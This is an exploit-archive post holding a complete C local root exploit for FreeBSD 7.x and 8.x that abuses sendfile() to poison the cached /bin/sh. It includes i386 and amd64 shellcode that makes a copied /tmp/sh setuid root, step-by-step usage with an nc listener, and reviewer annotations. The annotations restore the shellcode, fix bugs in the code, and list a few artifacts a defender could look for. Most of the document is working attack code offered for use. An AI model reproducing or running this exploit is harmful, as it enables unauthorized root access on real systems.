[local exploits] - FreeBSD 2010 8.*, 7.* Local Root Exploit
Posted on 01 October 2010
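/*
 * ======================================================================
 *  FreeBSD 2010 8.*, 7.* Local Root Exploit
 * ======================================================================
 *
 * "freebsd mbufs() sendfile cache poisoning - priv escalation, x86/x64
 *  local root xpl v2 by Hackeri-AL 2010"
 *
 * Author-reported test matrix: 8.1-RC1, 8.0-RELEASE, 7.3-RELEASE and
 * 7.2-RELEASE-p8 (the 7.2 run was done by "xd").
 *
 * What the author says it does: it poisons the cached contents of /bin/sh
 * so that the next time the system runs /bin/sh as root, the injected code
 * runs instead of the shell:
 *
 *     chown root /tmp/sh ; chmod a+s /tmp/sh ; execve /tmp/sh2
 *
 * What the code visibly does (see main() below): it connects to a TCP
 * listener on 127.0.0.1:7030, switches the /bin/sh descriptor to
 * O_NONBLOCK, and then alternates between write()ing a NOP sled plus the
 * payload to that socket and sendfile()ing 2048-byte pieces of /bin/sh
 * from a fixed file offset over the same socket, until st_size bytes have
 * been accounted for. Nothing is ever read from the socket: the listener
 * is only a sink, NOT a reverse shell - do not expect a prompt there.
 *
 * Usage (author's instructions, lightly edited):
 *
 *   on the target:   cp /bin/sh /tmp/sh ; cp /bin/sh /tmp/sh2
 *                    gcc cache.c -o cache
 *   start the sink:  nc -l 7030
 *   on the target:   ./cache 1        # i386
 *                    ./cache 2        # amd64
 *   wait: the author expects a root-run /bin/sh to hit the injected code
 *   within ~5 minutes "if lucky", after which
 *                    /tmp/sh          # should now be setuid root
 *   cleanup:         cp -f /tmp/sh2 /bin/sh
 *
 * The original write-up labels the `nc -l 7030` step "box 2 (LISTENER)",
 * but the program connects to 127.0.0.1, so the listener must run on the
 * target host itself (a second terminal) unless the address is changed.
 * The author also remarks that "there is a MUCH simpler way you could redo
 * this exploit" without saying what it is.
 *
 * Reviewer notes:
 *   - This copy of the listing had every backslash stripped, so the
 *     shellcode read "x31xc0..." (plain ASCII, not bytes). The \x escapes
 *     are restored below. The restored i386 bytes decode to chown, chmod
 *     and execve (FreeBSD syscalls 0x10, 0x0f, 0x3b via int 0x80) on
 *     "//tmp/sh" / "/tmp/sh2" with mode 0xded = 06755, which matches the
 *     author's description.
 *   - The original main() had no return type, used `return;` on the usage
 *     path, only warn()ed on a failed connect/open/fstat and then carried
 *     on (reading st_size from an uninitialized struct stat), and passed
 *     f + 1 to select() although only the socket was in the set. Those are
 *     fixed; the wire behaviour (what is written and sendfile()d, and at
 *     which offsets) is unchanged.
 *   - It deliberately corrupts the system shell; the author's cleanup step
 *     is what puts /bin/sh back. Only ever run it in a throwaway VM of an
 *     affected FreeBSD release.
 *   - Artifacts a defender can look for, from the code and the usage text:
 *     a loopback TCP connection to port 7030, a process holding /bin/sh
 *     open while streaming it through sendfile(), and a setuid-root copy
 *     of sh under /tmp.
 *   - Author's original notes: "this juarez is now private on #darknet";
 *     http://www.youtube.com/watch?v=JtgInqNNpCI
 *     http://www.youtube.com/watch?v=IdbRWrY4QBI
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/select.h>
#include <sys/stat.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <err.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

/*
 * i386 payload: chown("//tmp/sh", 0, 0); chmod("//tmp/sh", 06755);
 * execve("/tmp/sh2", ...). BSD int 0x80 convention (extra push before the
 * trap), syscall number loaded with "mov al, N": 0x10, 0x0f, 0x3b.
 */
static const char str32[] =
	"\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3"
	"\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
	"\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
	"\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";

/*
 * amd64 payload: the same three calls through the syscall instruction;
 * "/tmp/sh" is built by loading "\xff/tmp/sh" into rdi and shifting it
 * right by 8, "/tmp/sh2" is loaded directly.
 */
static const char str64[] =
	"\x48\x31\xc0\x99\xb0\x10\x48\xbf\xff\x2f\x74\x6d\x70\x2f\x73\x68"
	"\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05"
	"\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0"
	"\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89"
	"\xe7\x57\x52\x48\x89\xe6\x0f\x05";

enum {
	SINK_PORT   = 7030,      /* local nc listener, see header comment */
	CHUNK_BYTES = 2048,      /* bytes of /bin/sh per sendfile() batch */
	OFF_I386    = 2048 * 2,  /* file offset the author used on i386 */
	OFF_AMD64   = 1204 * 6,  /* author's amd64 offset (7224); looks like a
				  * transposed 1024 * 6 but is kept as tested */
	SLED_I386   = 256,       /* NOP bytes written before str32 */
	SLED_AMD64  = 100,       /* NOP bytes written before str64 */
	NOP         = 0x90
};

/*
 * Entry point.
 *
 * argv[1] selects the payload: "1" = i386, "2" = amd64. Any other argument
 * count or value prints the usage line and exits 1. socket/connect/open/
 * fstat/fcntl failures exit 1 through err(3). Returns 0 once sendfile()
 * has reported st_size bytes of /bin/sh as sent.
 */
int
main(int argc, char *argv[])
{
	struct sockaddr_in addr;
	struct stat sb;
	fd_set wset;
	char buf[512];
	const char *payload;
	size_t payload_len, sled, len;
	int64_t remaining;
	off_t file_off, sbytes;
	int s, f, flags, arch = 0, chunk = 0;

	_Static_assert(SLED_I386 + sizeof str32 <= sizeof buf &&
	    SLED_AMD64 + sizeof str64 <= sizeof buf, "buf too small");

	if (argc == 2) {
		if (strcmp(argv[1], "1") == 0)
			arch = 1;
		else if (strcmp(argv[1], "2") == 0)
			arch = 2;
	}
	if (arch == 0) {
		printf("[+] Define architecture i386 or amd64 (1/2)\n");
		return 1;
	}

	/* payload_len includes the string's NUL, exactly as the original's
	 * sizeof did; one extra byte after the shellcode is harmless. */
	if (arch == 1) {
		payload = str32;
		payload_len = sizeof str32;
		sled = SLED_I386;
		file_off = OFF_I386;
	} else {
		payload = str64;
		payload_len = sizeof str64;
		sled = SLED_AMD64;
		file_off = OFF_AMD64;
	}

	s = socket(AF_INET, SOCK_STREAM, 0);
	if (s < 0)
		err(1, "[-] socket");
	memset(&addr, 0, sizeof addr);
	addr.sin_family = AF_INET;
	addr.sin_port = htons(SINK_PORT);
	addr.sin_addr.s_addr = inet_addr("127.0.0.1");
	if (connect(s, (struct sockaddr *)&addr, sizeof addr) < 0)
		err(1, "[-] Failed to connect");

	f = open("/bin/sh", O_RDONLY);
	if (f < 0)
		err(1, "[-] Failed to open file");
	if (fstat(f, &sb) < 0)
		err(1, "[-] fstat failed");
	remaining = sb.st_size;

	/* It is the *file* descriptor that is made non-blocking, not the
	 * socket; that is part of the author's trigger, so keep it. */
	flags = fcntl(f, F_GETFL);
	if (flags < 0 || fcntl(f, F_SETFL, flags | O_NONBLOCK) < 0)
		err(1, "[-] fcntl failed");

	while (remaining > 0) {
		FD_ZERO(&wset);
		FD_SET(s, &wset);
		/* s is the only descriptor in the set, so nfds is s + 1
		 * (the original's f + 1 only covered s because f happened
		 * to be allocated after s). */
		if (select(s + 1, NULL, &wset, NULL, NULL) < 0)
			continue;

		if (chunk > 0) {
			/* Push the next piece of /bin/sh, always from the
			 * same file offset. Progress is whatever sendfile()
			 * reports in sbytes; if it keeps reporting 0 the
			 * loop spins, as it did in the original. */
			sbytes = 0;
			if (sendfile(f, s, file_off, (size_t)chunk, NULL,
			    &sbytes, 0) < 0)
				continue;
			chunk -= (int)sbytes;
			remaining -= sbytes;
			continue;
		}

		/* Between file chunks: a NOP sled followed by the payload. */
		chunk = CHUNK_BYTES;
		memset(buf, NOP, sled);
		memcpy(buf + sled, payload, payload_len);
		len = sled + payload_len;
		if (write(s, buf, len) < 0)
			warn("[-] write");	/* original ignored this; keep going */
	}

	close(f);
	close(s);
	return 0;
}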